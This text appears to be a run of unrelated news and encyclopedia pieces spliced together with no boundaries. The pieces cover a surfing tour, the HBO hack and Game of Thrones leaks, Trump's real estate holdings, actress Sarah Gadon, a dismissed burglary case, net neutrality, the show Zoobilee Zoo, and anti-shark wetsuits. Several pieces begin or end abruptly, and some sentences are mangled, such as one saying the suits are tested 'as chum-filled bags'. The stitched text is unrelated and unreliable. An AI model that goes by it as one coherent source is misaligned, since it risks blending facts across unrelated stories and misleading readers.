`` I thought it 'd take a couple of days at most , '' he says . In fact it took over three weeks of continuous effort , during which the team discovered rules dating back to the 1980s , including one describing how you 're supposed to paddle around a priority buoy . ( Yep , that 's what the surfers used to have to do . )
So what do we know about 2014 ? First up : there are more contests . Aside from committing to 11 men 's events , the ASP is investing heavily in the women 's tour , re-setting three new events in Fiji , Trestles and Maui and bringing the overall number to 10 , just one off the men 's . It 's made what seems like an eminently smart move in bringing the Big Wave World Tour under its care .
It 's also invested a considerable sum in two ex-surf industry names : Rod Brooks , former Quiksilver head of WCT events and now ASP 's event consultant , and Graham Stapelberg , former Billabong marketing VP and now ASP 's head of strategy . ( A hallmark of the new ASP is awesome job titles , by the way ; we asked Perrow if he had a card with `` Commissioner '' printed on it . He confirmed that he did . )
`` Some people are going to feel like they 're being left out . That 's natural when you have a change happening . But I think ( ZoSea ) are doing OK so far . '' -- Kelly Slater
The leaks are coming !
HBO — the network that turned George R.R . Martin 's legendary book series into your Sunday night television obsession — has been hacked , and according to Entertainment Weekly , several upcoming episodes of television series and at least one script have been obtained by the cyberattackers .
Included in the 1.5 terabytes of data acquired is an upcoming episode of Ballers and Room 104 and a script that 's reportedly of the next Game of Thrones episode ( Season 7 , episode 4 . ) The items have already been posted online and more footage is promised to be `` coming soon . ''
“ HBO recently experienced a cyber incident , which resulted in the compromise of proprietary information , ” the network confirmed to Mashable . `` We immediately began investigating the incident and are working with law enforcement and outside cybersecurity firms . Data protection is a top priority at HBO , and we take seriously our responsibility to protect the data we hold . ''
In an email to employees , HBO Chairman and CEO Richard Plepler described the intrusion as `` obviously disruptive , unsettling , and disturbing , '' however he assured everyone that the company 's leadership members and tech team were working with outside experts `` round the clock '' to protect the company from any future cyberattacks .
According to EW , the following anonymous email was sent to many reporters on Sunday night announcing the hack :
`` Hi to all mankind . The greatest leak of cyberspace era is happening . What 's its name ? Oh I forget to tell . Its HBO and Game of Thrones…… ! ! ! ! ! ! You are lucky to be the first pioneers to witness and download the leak . Enjoy it & spread the words . Whoever spreads well , we will have an interview with him . HBO is falling . ''
Though it 's not yet clear if the hackers obtained video of upcoming Game of Thrones episodes , it would n't be the first time the popular show was associated with leaks . During the show 's fifth season the first four episodes were leaked online before the show even premiered , resulting in HBO 's decision not to send press copies of the episodes in advance .
Dubbed the most pirated television show six years in a row , Game of Thrones is in high demand for hackers , and to show just how many people are pirating the episodes the University of California 's Abigail De Kosnik set out to make an epic timelapse .
The Next Web explained that after Season 7 premiered , De Kosnik tracked 72 Game of Thrones-labeled torrents and discovered that out of the `` 12.2 million viewers the show 's premiere attracted in the first five days , 1.77 million came from illegal sources . ''
To see the data broken down visually check out the timelapse below :
In his email to HBO employees about the leaks Plepler concluded by saying , `` The problem before us is unfortunately all too familiar in the world we now find ourselves a part of . As has been the case with any challenge we have ever faced , I have absolutely no doubt that we will navigate our way through this successfully . ''
Nick Penzenstadler , Steve Reilly , and John Kelly | USA TODAY
USA TODAY
LAS VEGAS — President Trump 's companies own more than 400 condo units and home lots whose sale could steer millions of dollars to Trump , a USA TODAY investigation has found .
USA TODAY spent four months cataloging every property Trump 's companies own across the country . Reporters found that Trump 's companies are sitting on at least $ 250 million of individual properties in the USA alone . Property records show Trump 's trust and his companies own at least 422 luxury condos and penthouses from New York City to Las Vegas , 12 mansion lots on bluffs overlooking his golf course on the Pacific Ocean and dozens smaller pieces of real estate . The properties range in value from about $ 200,000 to $ 35 million each .
Unlike developments where Trump licenses his name to a separate developer for a flat fee , profits from selling individual properties directly owned by his companies ultimately enrich him personally .
Trump has never disclosed a complete , unit-by-unit inventory of his companies ' real estate holdings or sales , nor is he required to do so by federal law . Trump says he 's separated himself from his businesses , but the trust set up in January is run by his sons . Trump is the only beneficiary and can withdraw funds at any time .
The volume of real estate creates an extraordinary and unprecedented potential for people , corporations or foreign interests to try to influence a president . Anyone who wanted to court favor with the president could snap up multiple properties or purposefully overpay . They could buy in the name of a shell company , making it impossible for the public to know who was behind the sales .
The potential for conflicts is exacerbated by Trump 's refusal to release his tax returns or fully separate himself from his businesses , breaking with precedent set by presidents going back four decades . Since Congress passed the Ethics in Government Act in 1978 , all six presidents from Carter to Obama established blind trusts or limited investments to assets like mutual funds . Trump has not .
The president is exempt from most conflict-of-interest laws that apply to others working in the federal government . He is not required to disclose when units sell or who bought them .
He is barred by the Constitution from receiving gifts from foreign governments or officials . Trump 's assessment that the ban does n't apply to market-rate transactions is debated in lawsuits and among ethics experts .
Regardless , it may be impossible for the public to even know who is behind purchase because the rules governing real estate transactions allow for shell companies to make purchases without disclosing who actually paid the money .
“ Anyone seeking to influence the president could set up an anonymous company and purchase his property , ” said Heather Lowe , director of government affairs at Global Financial Integrity , a D.C.-based group aimed at curbing illicit financial transactions . “ It 's a big black box , and the system is failing as a check for conflicts of interest . ”
Since Election Day , records show Trump companies have sold at least 14 luxury condos and home-building lots for about $ 23 million . Half were sold to limited liability companies . No names were listed in deeds , obscuring buyers ' identities .
Since launching his White House bid , Trump 's companies have sold at least 58 units nationwide for about $ 90 million . Almost half of those sold to LLCs .
That does n't count Trump 's ownership of millions of square feet of some of America 's priciest office and retail rental space in Manhattan , Chicago and San Francisco .
Buyers and renters of Trump properties include companies or individuals tracing to addresses in at least a dozen countries .
The White House refers business inquiries to the Trump Organization , where four separate executives and spokesmen declined to answer specific questions .
Bobby Burchfield , an attorney hired as an independent ethics reviewer for Trump Organization business deals , would n't answer specific questions about transactions .
Trump attorneys have argued that profits from individual real estate sales would route through a maze of Trump subsidiaries and eventually become mixed in a larger pool of undifferentiated money in the president 's trust . That , they say , makes a direct conflict from an individual sale more difficult to imagine . They do not consider sales of U.S. real estate to foreign investors as “ foreign deals . ''
Those in the business of selling Trump-owned real estate say business is up .
“ I get a lot more phone calls now that he 's the president , ” said Shari Sanderson , a real estate agent that sells units in the Las Vegas hotel-condo tower .
A mysterious bulk buyer
A couple of weeks before the Republican National Convention , a Las Vegas financial firm filed paperwork to found Milan Investment Limited in Nevada .
Days later , the newly minted company went on a buying spree . Milan spent $ 3.1 million over four months to buy 11 luxury condos in a shimmering golden tower near the Strip that Trump owns with friend and casino mogul Phil Ruffin . Trump Ruffin LLC collected the last of the money weeks before Trump was elected .
Milan Investment tracks back to what appears to be an incorrect address , the strip mall office of a financial services firm .
The owner , Thomas Sullivan , said he never heard of Milan Investment but said a federal “ regulatory ” agency visited his office in person asking similar questions . He declined to identify the agency .
Steve Marcus for USA TODAY
“ We 're completely in the dark , ” Sullivan said . “ We do n't know if it was a mistake , or they used our address for some reason , but we are n't associated with them . ”
On the deeds from Milan 's purchases , Eric Trump signed for the sellers . An accountant signed for the buyers , and deeds do not identify any people behind Milan .
USA TODAY tracked corporate , loan and property records across Nevada , Texas and Canada to tie three names to Milan Investment .
In Nevada , where rules let anyone form companies without identifying the owners , Milan 's officers are listed as Jun Xu and Qi Huang with an address at an office suite on the outskirts of Las Vegas .
Additional documents underlying the sale give two more addresses , both million-dollar condos in Vancouver , for Xu and Huang . Canadian records indicate they own both and hold a license to rent one . The records list Xu as a “ businessman ” and Huang as a “ housewife . ”
USA TODAY contacted every phone number and address found for Xu and Huang in two countries . Reporters also contacted every business associate identified in Nevada public records as having worked with the company or assisted with the condo buys , trying to reach Xu and Huang or find out more about them . Xu and Huang have not responded .
One more name tied to Milan is Chen Huang of Sugar Land , Texas , who signed loan documents “ on behalf of Jun Xu and Qi Huang ” when they borrowed money using the Vegas condos as collateral . Phone numbers for Chen Huang in Texas were answered but disconnected after a reporter identified himself .
Most Nevada real estate and legal professionals who handled deals would not answer questions . A lawyer who reviewed paperwork for the lender , Michael Wixom , said only , “ We file the UCC paperwork and represent the bank locally . It 's all consistent with Nevada state law , and it 's not unusual to not know the name of the owners . ”
Reporters sent questions about the identity-obscuring real estate sales to a public relations firm representing Trump in New York , the Trump Organization 's marketing vice president , its vice president of sales in Las Vegas and Eric Trump . None of the inquiries was answered .
The deal in 2016 makes Milan Investment the third-biggest investor in the Vegas building , behind Trump 's own company and Hilton Hotels , which owns 311 of the condos .
Kathleen Clark , a government ethics expert and professor at Washington University School of Law , said there 's a strong argument for requiring disclosure of anyone buying real estate from the president .
“ They 're doing it through Trump companies , but nevertheless , if it 's going to benefit the president , I think the public has a right to know who 's paying the president , ” Clark said . One solution : making the president subject to the same rules as other public officials .
Who 's buying from Trump ?
USA TODAY 's review of sales of Trump-owned real estate found dozens of transactions during and since the campaign involving buyers who have business in or connections with foreign countries , or are shielded by purchasing under the name of an LLC . None of the recorded sales prices appeared , on the surface , to be outside market value .
In February , businesswoman Xiao Yan Chen bought one of the president 's penthouses at Trump Park Avenue in Manhattan for $ 15.9 million , according to city records .
Chen is founder and managing director of Global Alliance Associates , a New York City firm described on its website as “ a boutique business relationship consultancy for U.S. companies seeking to establish a presence in mainland China. ” She could not be reached for comment .
A few days before Trump 's inauguration , a two-bedroom condo on the 55th floor of the Las Vegas tower sold for $ 639,000 . The buyer of Condo No . 5507 is identified in deeds as Fashion Drive , a New York company named for the street below and formed days before the purchase .
Frank Franklin II , AP
The only real person named in company 's corporate filings in New York is Ivan Antonevich , a Ukrainian-educated pain doctor who did not reply to interview requests . It 's unclear whether he owns the condo , represents the buyer , or something else happened .
As part of a federal crackdown on criminals using real estate to hide illicit cash , title insurance companies in a handful of U.S. cities must gather identity information and report all-cash deals above certain amounts to the government . Industry insiders said the opacity of most shell company real estate buys is for practical , legitimate reasons .
“ Privacy is a big driver of the LLCs , whether it 's celebrities protecting their privacy or foreign dissidents hiding assets from an oppressive government or law enforcement officers worried about their safety from criminals , ” said Steve Gottheim , senior counsel at the American Land Title Association .
Some investors in the Vegas building were easy to track down and willing to talk . One New York couple set up a company , SNJ Properties , to buy a unit in December . SNJ is owned by Susan and John Irwin of East Islip , N.Y. , who bought a second condo in the building for vacation and as an investment . They said it did n't have much to do with politics .
“ I 'm a big fan of his , but the fact that Trump is president did n't influence our decision , ” said John Irwin , who owns Irwin Construction . Irwin , who met Trump at the hotel once , said he does n't worry about other people 's blind purchases of Trump 's real estate . “ It does n't bother me . He 's a businessman , and that 's who we elected . ”
Trump 's leasable space in cities such as New York , Chicago and San Francisco bring in large sums as well . Commercial space at Trump Tower earned him almost $ 30 million in 2012 , according to a filing with the Securities and Exchange Commission to back up a loan Trump took out against the space .
Among the revenue : multimillion-dollar lease payments from the communist government-owned Industrial & Commercial Bank of China .
The Chinese bank 's lease is one of several transactions flagged in a lawsuit against Trump by an ethics watchdog group , alleging Trump violates the Emoluments Clause of the U.S. Constitution , which forbids government officials from taking gifts from foreign powers .
More deals ready to be made
The White House and Trump surrogates have broadly contended that the president is not involved in his business deals and scoff at the idea that a billionaire tycoon could be influenced by individual real estate transactions in the six- or seven-figure range .
The USA TODAY review of publicly available records — including figures provided by the president himself — shows that his individual real estate transactions add up and have substantially driven his income in recent years .
Consider the Vegas tower . In his federal financial disclosure in 2016 , the income Trump said he received from the Vegas venture is more than the revenue he reported from all but one of his approximately 500 companies .
USA TODAY 's analysis of the 2016 report indicates Trump 's income includes at least $ 100 million a year from real estate sales and lease transactions . That number is probably higher because companies ' income is reported in ranges spanning millions of dollars .
Trump and his daughter Ivanka have reported drawing multimillion-dollar incomes from Trump International Realty in recent years . Trump 's financial disclosure reported about $ 4 million in commissions in 2016 , and Jared Kushner 's disclosure reports his wife earns $ 1 million to $ 5 million a year in commissions and fees from the firm .
At Trump properties across the country , more deals are ready to be made .
“ We 're selling quite a few of those now , ” Ruffin said of the partners ' Vegas tower , where he and Trump own 388 condos and penthouses . “ It 's picked up , our volume. ” Ruffin owns an adjacent lot and is interested in building another tower and casino there , possibly partnering with the Trump Organization .
Steve Reilly , USA TODAY
In total , records show Trump and his family own 32 residential condo units , plus 82 additional smaller units of real estate , including commercial property and storage spaces across New York City . That 's where the biggest money transactions are in the making .
Trump 's realty company lists one of his three-bedroom condos on the seventh floor of Trump Park Avenue for $ 7 million , touting solid oak floors , handcrafted Italian brass doorknobs , marble baths and “ a sleek gourmet chef 's kitchen. ” Also for sale : a Trump-owned seven-bedroom penthouse on the 32nd floor . The $ 75,000-a-month rent gets you “ 360-degree views of New York City 's stunning landscape . ”
At 100 Central Park South , beneath the facade bearing the words “ Trump Parc ” in gold script , placards recently filled the windows advertising “ RETAIL SPACE FOR LEASE. ” The rent : $ 1.3 million a year .
Canadian actress
Sarah Gadon ( born April 4 , 1987 ) is a Canadian actress . She first gained recognition for her performances in David Cronenberg 's films A Dangerous Method ( 2011 ) and Cosmopolis ( 2012 ) . She has guest starred in a number of television series , including Are You Afraid of the Dark ? ( 1999 ) , In a Heartbeat ( 2000 ) , Mutant X ( 2002 ) , and Dark Oracle ( 2004 ) . She has also worked as a voice actress on various productions .
In 2015 , Gadon co-starred in Miramax 's supernatural thriller The 9th Life of Louis Drax and portrayed a young Elizabeth II in the comedy A Royal Night Out . The following year , she starred as Sadie in the Hulu miniseries 11.22.63 , an adaptation of Stephen King 's novel 11/22/63 . In 2017 , Gadon played the lead role in the CBC miniseries Alias Grace , based on the Margaret Atwood novel of the same name .
Throughout her career , she has earned numerous accolades , including two Canadian Screen Awards , for her performances in Alias Grace , [ 2 ] and Denis Villeneuve 's Enemy ( 2014 ) . [ 3 ] In 2016 , she was honored with the Award of Excellence by the Alliance of Canadian Cinema , Television , and Radio Artists ( ACTRA ) . [ 4 ]
Early life and education [ edit ]
Gadon was born in Toronto , Ontario , to a psychologist father and teacher mother . [ 5 ] She has an older brother named James . Gadon has English and Italian ancestry . [ 6 ] She spent much of her childhood and adolescence training and performing as a dancer , with time spent as a Junior Associate at The National Ballet School of Canada and as a student at the Claude Watson School for the Performing Arts . [ 7 ] She graduated from high school as an Ontario Scholar from Vaughan Road Academy in 2005 . [ 8 ] By 2014 , she had completed her studies in the University of Toronto 's Cinema Studies Institute at Innis College . [ 9 ] [ 10 ]
Career [ edit ]
Gadon started acting at the age of 10 with her first acting role as Julia in an episode of La Femme Nikita ( 1998 ) . For the next few years , she took episodic roles in various television series , including Monica in Are You Afraid of the Dark ? ( 1999 ) , Young Laura Burnham in Twice in a Lifetime ( 2000 ) , Catherine Hartman in Mutant X ( 2002 ) , Claudia in Dark Oracle in 2004 , Vicki in Life with Derek ( 2005 ) , and Tasha Redford in Flashpoint ( 2008 ) .
Gadon in 2011
She also has a number of television films to her credit . She was nominated for the Young Artist Award for Best Ensemble in a TV movie for her first film , The Other Me ( 2000 ) , portraying Heather . Other roles include Samantha in What Girls Learn ( 2001 ) , Amanda in Cadet Kelly ( 2002 ) , Julia Norton in Code Breakers ( 2005 ) and Celeste Mercier in The Cutting Edge : Chasing the Dream ( 2008 ) .Gadon had recurring roles in many television series : Zoe Kessler in The Border ( 2008–2009 ) , Katie Atkins in Being Erica ( 2009 ) , Georgia Bravin in Happy Town ( 2010 ) and Ruby Odgen in Murdoch Mysteries ( 2009–11 ) . She is also behind the voice of the title character in the animated series Ruby Gloom ( 2006–07 ) , Beth in Total Drama ( 2007–2011 ) and Portia in Friends and Heroes ( 2007–09 ) . Gadon was nominated for a Gemini Award in 2008 for Best Individual or Ensemble Performance in an Animated Program or Series for her work in Ruby Gloom ( 2008 ) .
In 2005 , she filmed for Where Love Reigns , a promotional film co-starring Douglas Henshall . [ 11 ]
Her filmography includes both feature length and short films . Her first feature film was Fast Food High ( 2003 ) where she portrayed Zoe . She portrayed Margaret in the dark comedy Siblings , Priscilla in Charlie Bartlett ( 2007 ) and Laura in Leslie , My Name is Evil ( 2009 ) .
Her short film work includes Haley in Burgeon and Fade ( 2007 ) , Julia in Grange Avenue ( 2008 ) and Gabrielle in Spoliation ( 2008 ) . Burgeon and Fade won the Special Jury Award at the WorldFest Houston Festival for original dramatic short film . She also starred in the short indie film , The Origin of Teddy Bears , as Madison . [ 12 ]
In 2011 , Gadon starred in David Cronenberg 's Cosmopolis , alongside Robert Pattinson , as his on-screen wife of 22 days , Elise Shifirin . She played Phillippa in the television adaptation of Ken Follett 's bestseller World Without End , an eight-hour event series . [ 13 ] She featured in Brandon Cronenberg 's debut feature , Antiviral as Hannah Geist , a mega-star in a sci-fi world where fans pay to be infected with the diseases of the rich and famous . [ 14 ] [ 15 ]
Gadon at the 18th CFC Annual Gala and Auction
In 2012 , she appeared as Carl Jung 's wife Emma in the David Cronenberg film A Dangerous Method and in a Canadian short film , Yellow Fish , alongside J. Adam Brown . [ 16 ] On May 23 , 2012 in Cannes , Birks presented the first Birks Canadian Diamond award to Gadon and Emily Hampshire during Telefilm Canada 's inaugural Tribute To Canadian Talent press event and reception . [ 17 ]
She played Miss Elizabeth Murray in the 2013 release of the film Belle . She co-starred in Denis Villeneuve 's Enemy ( 2013 ) , based on the José Saramago book , The Double ( 2002 ) , [ 18 ] and in David Cronenberg 's Maps to the Stars ( 2014 ) , a dark comic look at Hollywood excess . [ 19 ]
She participated in the CBC `` Canada Reads '' competition in March 2014 . In September 2014 , it was announced that she was cast in Miramax 's supernatural thriller The 9th Life of Louis Drax , along with Jamie Dornan and Aaron Paul . [ 20 ] The film was released in September 2016 . Gadon played Dracula 's wife Mirena ( and briefly the modern-day Mina ) in the historical action film Dracula Untold , released in October 2014 . [ 21 ]
Gadon made her directorial debut with an episode of Reelside , a documentary series , which focused on her collaborative relationship with photographer Caitlin Cronenberg ; the episode premiered on The Movie Network in Canada June 4 , 2015 . [ 22 ] In 2015 , Gadon appeared as Princess Elizabeth in A Royal Night Out , a heavily fictionalized account of the future Queen 's incognito night on the town , along with her sister Princess Margaret , on the evening of VE Day .
In 2016 , Gadon starred opposite Logan Lerman in Indignation , an adaptation of Philip Roth 's 2008 novel of the same title , and opposite James Franco in 11.22.63 , a television mini-series version of Stephen King 's novel of the same title . [ 23 ]
Filmography [ edit ]
Feature film [ edit ]
Short film [ edit ]
Year Title Role Notes 2007 Burgeon and Fade Haley 2008 Grange Avenue Julia MacMillan 2008 Spoliation Gabriella 2012 BearHug Madison 2012 Yellow Fish Cait 2017 Paseo Alice Post-production , also writer 2017 Lolz-ita Sarah Completed
Television [ edit ]
Awards and nominations [ edit ]
Notes [ edit ]
^ Year in which awards ceremony was held .
Ricky Davis is seen in this file photo . Photo by Dan Henry /Times Free Press . Photo by Dan Henry /Times Free Press .
Charges were formally dismissed today for a man who was arrested for a series of home invasions in the North Shore area in 2010 .
Ricky Davis , 26 , was charged with multiple residential burglaries and robberies in the summer of 2010 .
But in March , Judge Barry Steelman ruled that the evidence gathered by Chattanooga Police investigators with a GPS tracking device can not be used because they did not get a warrant for it , first .
He cited a similar case that the U.S. Supreme Court had issued an opinion about in 2011 , stating that an up-to-date warrant is required for any GPS tracking .
`` The state no longer has that evidence , so they ca n't confirm or deny those allegations , '' said Davis ' attorney Chris Dixson .
Before his 2010 arrest , Davis had been in state prison from 2006 to 2010 for guilty pleas on aggravated burglaries in the same area of town .
After the dismissal , Davis , who still denies the allegations against him , said that he had work lined up at a recycling company and was writing a book about his experiences .
`` He has been very patient throughout this whole ordeal , and we are just glad to see this all resolved , '' Dixson said .
Imagine if the Mafia got hold of the internet . You 'd still be able to do what you do today , but you 'd have to do it via the Mafia 's chosen suppliers - and those suppliers would have to pay their protectors if they wanted to stay in business , passing on the costs to their customers .
`` Nice streaming business you 've got there , '' thick-necked goons might say to them . `` Shame if something happened to it . ''
That 's pretty much what the US is proposing .
The US is n't handing the internet over to the Mafia , of course , but critics of proposed new rules believe they will have much the same effect . They believe that the system the FCC is proposing to `` better serve the market '' will make the internet worse and result in significantly higher costs for consumers .
Why you might end up paying more
`` The FCC is proposing a new set of regulations for the 'last mile ' , the final stretch of the internet between the ISP and the customer ''
Anything that needed a decent quality of service , critics say - gaming , video streaming , music - would have to pay extra for it , and those costs would be passed on to us .
It 's all about net neutrality ; the idea that all data should be treated equally whether it 's an email from your gran , a download from iTunes or a stream from the BBC . It 's one of the fundamental principles of the internet as we know it , and critics say that the FCC is proposing getting rid of it .
The FCC is proposing a new set of regulations for the `` last mile '' , the final stretch of the internet between the ISP and the customer , under which ISPs would be able to charge `` commercially reasonable '' terms for prioritising particular kinds of content .
Networks wo n't be allowed to degrade the experience for , or block the websites of , services that do n't pay , but they wo n't be under any obligation to ensure that those services get the bandwidth they need either .
The giant US ISP Comcast is already demonstrating the issues that might raise . Its Xfinity On Demand service for the Xbox is handled differently from other services : video comes from Comcast 's own network , not the wider internet , and the data it uses does n't come out of customers ' monthly data allowances .
Comcast says it is n't prioritising Xfinity traffic , which is technically true , but in its own words it does `` provision a separate , additional bandwidth flow into the home for the use of this service - above and beyond , and distinct from , the bandwidth a customer has for his or her regular Internet access service . '' That means Xfinity has a clear advantage over rival services such as Netflix .
Netflix , as you might expect , is n't very happy about that - but that has n't stopped Netflix from paying Comcast for preferential treatment of its own content .
Pay to play
In February , Netflix signed a deal with Comcast to deliver smoother streaming of its video . As The Economist explained at the time , the agreement `` effectively re-draws the model for internet provision in the US , '' paving the way for ISPs to `` divide what is essentially a single internet pipeline into 'fast ' and 'slow ' lanes ( bestowing ISPs with more monopoly power ) . ''
Netflix CEO Reed Hastings may have signed the deal and enjoyed a massive speed increase on Comcast 's network as a result , but that does n't mean he 's happy about it . In fact , he sees it as a warning of the internet 's future .
Netflix is against web regulation for obvious reasons
In a recent letter to shareholders , Hastings writes that `` the internet faces a long term threat from the largest ISPs driving up profits for themselves and costs for everyone else . '' It is these `` costs '' that perhaps influenced Netflix 's decision to up its subscription fees this month . Comcast , naturally , says he 's talking out of his hat .
Netflix can afford it , but that is n't really the point . The worry is that under the proposed new regime , the next Netflix - and the next YouTube , and Vimeo , and Skype , and so on - wo n't get off the ground because they wo n't be able to afford the same fast lanes the big names use .
The next generation of online services could be held to ransom by ISPs doing a pretty good impression of the mafia goons we described earlier .
Europe vs the US
`` The next generation of online services could be held to ransom by ISPs doing a pretty good impression of mafia goons ''
In Europe , the EU is going in the opposite direction from the US , with legislation enforcing net neutrality currently going through the European Parliament .
As the BBC reports , MEPs feared that `` unless new rules were put in place , internet providers might threaten to slow down traffic from data intensive services - such as video-on-demand and cloud storage - unless the firms behind them paid a fee . ''
Mobile and cable firms have objected to this because it `` would prevent them from… charging a movie site a fee to ensure that their 4K ultra-high definition films played smoothly on consumers ' devices '' .
In the US , the concern is that the FCC 's proposed consumer protection is too weak . Firms will have to offer a `` baseline '' service and would n't be able to indulge in `` commercially unreasonable '' practices , but that 's open to all kinds of interpretations .
Deliberately hobbling a site or service would no doubt be `` commercially unreasonable '' , but what about neglect , latency issues or prioritising rivals ? And given the slow speed at which regulators operate , would `` commercially unreasonable '' behaviour be stopped and punished quickly enough to prevent startups from being suffocated ?
No such thing as a `` fast lane ''
The big worry here is that you ca n't prioritise some content without having a knock-on effect on other kinds of content . Much of the publicity over the FCC proposals has talked about `` fast lanes '' , but they do n't exist : internet data comes to your house via the same pipes whether its providers pay extra or not .
A fast lane for the internet ? Many companies are opposed to the idea
Think of it in terms of a budget airline introducing speedy boarding : it does n't add more seats to the plane to accommodate the speedy boarders ; it just makes everybody else wait while they get on board . That becomes self-perpetuating , because the more people pay for speedy boarding , the longer everybody else has to wait - so before long the only way to ensure you do n't spend your day queuing is to stump up the extra cash like everyone else .
The good news is that that particular vision might not come true just yet : the UK has the EU in the consumer 's corner , and in the US the FCC proposals have caused a massive storm of negative publicity - much of it focusing on the fact that the boss of the FCC is a former cable and wireless industry lobbyist , which casts doubts on whether the man in charge of net neutrality is neutral himself .
It 's quite possible that the negative publicity will force the FCC to backtrack again - for a while , at least - but this issue is n't going to go away . The struggle between content providers and ISPs has been raging for years ( remember when ISPs were furious at the original iPlayer ? ) , and this is just the latest skirmish in what 's already proven to be a very long war .
This article is about the children 's television series . For the toyline by Spin Master , see Zoobles ! For the anime , see Zoobles ! ( anime )
Zoobilee Zoo is a children 's television series featuring actors dressed as animal characters that originally aired from 1986 to 1987 . It continued to run in syndication until 2000 [ 1 ] on several television channels including commercial network television stations , public television stations , The Learning Channel , and the Hallmark Channel . The original 65 episodes are currently owned by Hallmark Properties and were produced by WQED Pittsburgh .
Hosted by Ben Vereen , the show centers around a group of six artistic animal friends who live in Zoobilee Zoo and frequently break into song and dance . [ 2 ]
Plot [ edit ]
Each episode is opened by a greeting from host Ben Vereen , dressed as a spotted snow leopard , who plays the mayor of Zoobilee Zoo . [ 1 ] Speaking directly to viewers that he refers to as `` Zoobaroos '' , [ citation needed ] Vereen usually appears throughout each episode to summarize the main themes or to perform a song and dance . [ 2 ]
The plot in each episode centers around the main characters , called Zoobles , [ 3 ] as they play together and encounter difficulties common to young children . The primary themes are cooperation , making friends , and creativity . [ 2 ]
Cast and characters [ edit ]
Each Zooble character has a certain artistic talent that shapes the way they approach different scenario . [ 2 ]
Sandey Grinn as Bill Der Beaver in all but 2 episodes ( see below ) , who likes to invent and fix stuff .
Forrest Gardner as Van Go Lion , who enjoys art .
Karen Hartman as Talkatoo Cockatoo , who enjoys reading , writing , and speech .
Michael B. Moynahan as Lookout Bear , who enjoys adventuring and travel .
Gary Schwartz as Bravo Fox , an Ed Wynn-like showman who encourages the talents of theatre and acting .
Louise Vallance as Whazzat Kangaroo , the youngest Zooble who encourages kids to enjoy music and dance .
Ben Vereen as Mayor Ben , a snow leopard who stars as the host of the show explaining what kind of adventure the Zoobles will be having .
Michael Sheehan as the original Bill Der Beaver in 2 episodes . When Sheehan decided to leave the show for other interests ( such as Jem ) , he was replaced by Sandey Grinn .
Minor Characters [ edit ]
Roger Behr as Limerick Leprechaun
Roger Peltz as Rhymin ' Simon
Crosby the Dog as Crosby
Suzy Gilstrap as Sandy
Robert Shields as Elmo the Clown
Background and production [ edit ]
Premiering on September 15 , 1986 , Zoobilee Zoo was produced and directed by Steve Binder . The show 's concept was developed by Hallmark Entertainment which partnered with children 's production company DIC Enterprises . [ 1 ]
In 1992 , The Learning Channel picked up the show as part of its Ready Set Learn lineup for preschoolers . [ 1 ] [ 4 ]
Episodes were released on a wide array of VHS tapes , the most recent series released in 1997 , but not yet released to DVD . In 2000 , 14 new direct-to-video episodes and soundtracks were released , and the stage show `` Zoobilee Zoo Live ! '' toured briefly , with several of the cast members reprising their roles . [ citation needed ]
Reception [ edit ]
Zoobilee Zoo was well received critically , but earned only modest viewer ratings . It was praised by the National Education Association ( NEA ) , the American Federation of Teachers and the National association of Elementary School Principals . In addition , it was endorsed by the Action for Children 's Television ( ACT ) . [ 2 ]
Episodes [ edit ]
( * These are the first two episodes filmed ( but aired out of sequence ) featuring Michael Sheehan as Bill Der Beaver ; all other episodes feature Sandey Grinn in that role )
A Star is Born Time for Laughs Blue Ribbon Zoobles Bravo , Come Home ! Land of Rhymes * The Genie When You Wish Upon a Tooth Fairy The Robot Zoobles Trading Places The Great Trash Mystery Strike Up the Band Mystery in Zoobilee Zoo Bill Sees Stars The Cockatoo/Fox Report Grown Up for a Day * Winter Wonderland Fox in Wolf 's Clothing Vaudeville Star Is There a Doctor in the House ? Backwardville Speak to Me , Bill A Sticky Situation To See or Not to See Just in Time The Cave Zoobles The Bear Behind the Badge One Touch of Van Go Job Hunting The Great Game # 1 Lookout , Super Zooble Invisible Zooble Lookout 's Dog Endangered Zoobra Bravo 's Puppets The Witch 's Spell Talkerella The Great Game # 2 Van Go , Master Painter The Ghost of Zoobilee Woods Pigment Puzzle Whazzat the Clown The Great Zooble Tryouts Got ta Dance Close Encounters of a Zooble Kind Laughland Lady Whazzat The Zooble Book of Records Sing Along # 1 The Magic Ring A Trip to Memoryland The Zooble Hop Attack of the Giant Potatoes Popular Bill Simon and Leprechaun Pictures to Remember Smart Dummy The Zoobadoobas Sing Along # 2 A Camping We Will Go Bravo 's Party Two 's a Crowd Piano Man Bill Surprise , Surprise The Teleportation Machine Without a Sound
Awards and recognition [ edit ]
The series was awarded the 1987 Daytime Emmy for Outstanding Costume Design .
See also [ edit ]
( Credit : SAMS )
Scientists have designed a new type of camouflage wetsuit that is designed to make ocean swimmers invisible to sharks .
Since 1791 , there have been at least 876 shark attacks in Australia . That 's not a huge number for more than 200 years , but with a 29 per cent fatality rate , lessening or even preventing the number of attacks can only be a good thing .
That may just be a possibility now , thanks to the work of scientists at the University of Western Australia 's Ocean Institute , who have been studying shark vision for two years , and Shark Attack Mitigation Systems ( SAMS ) . Together , they 've designed two new wetsuits that make the wearer unpalatable to sharks .
The two suits each feature a different kind of patterning .
The first , `` Elude '' , is for divers and swimmers , and is designed to make the wearer `` invisible '' through the use of camouflage . Although sharks use smell and weak electrical fields to detect prey , vision is the most important of the shark 's senses when it enters the final stages of attack . The patterning on the Elude wetsuit uses a disruptive pattern that is difficult for a colour-blind shark to see , as well as colour schemes that blend into the ocean — so , although the shark may be aware of the human presence , it wo n't be able to see them .
The second pattern , `` Diverter '' , designed for surfers , is the opposite in terms of visibility , patterned with bold black-and-white stripes . Although sharks are colour blind , they have very sharp perception when it comes to shading . The patterning on the Diverter suit is based on boldly patterned sea creatures that use their banded colouration as a warning to predators that they are venomous ; and , indeed , sharks tend to avoid eating striped fish . Diverter presents the wearer as unpalatable — and possibly even toxic — to a hungry shark .
Both suits are still undergoing testing as chum-filled bags , but preliminary results have shown the suits to be highly effective — so much so that the suits are already available for pre-order through surf brand Radiator from AU $ 429 , with an expected arrival date of 9 October . Surfers can also snap up a Diverter sticker for their surfboard from AU $ 69 , arriving on 15 August .
Via www.guardian.co.uk
At several points throughout his campaign , Donald Trump has called for his supporters to organize themselves into vigilante election-integrity monitors . Building on the rich tradition of Republican “ voter fraud ” hysterics , Trump warns attendees at his rallies that unspecified funny business is happening at polling places in “ certain areas , ” and instructs them to cast their ballots and then head to one of those “ certain areas ” to make sure the election is n't stolen from him .
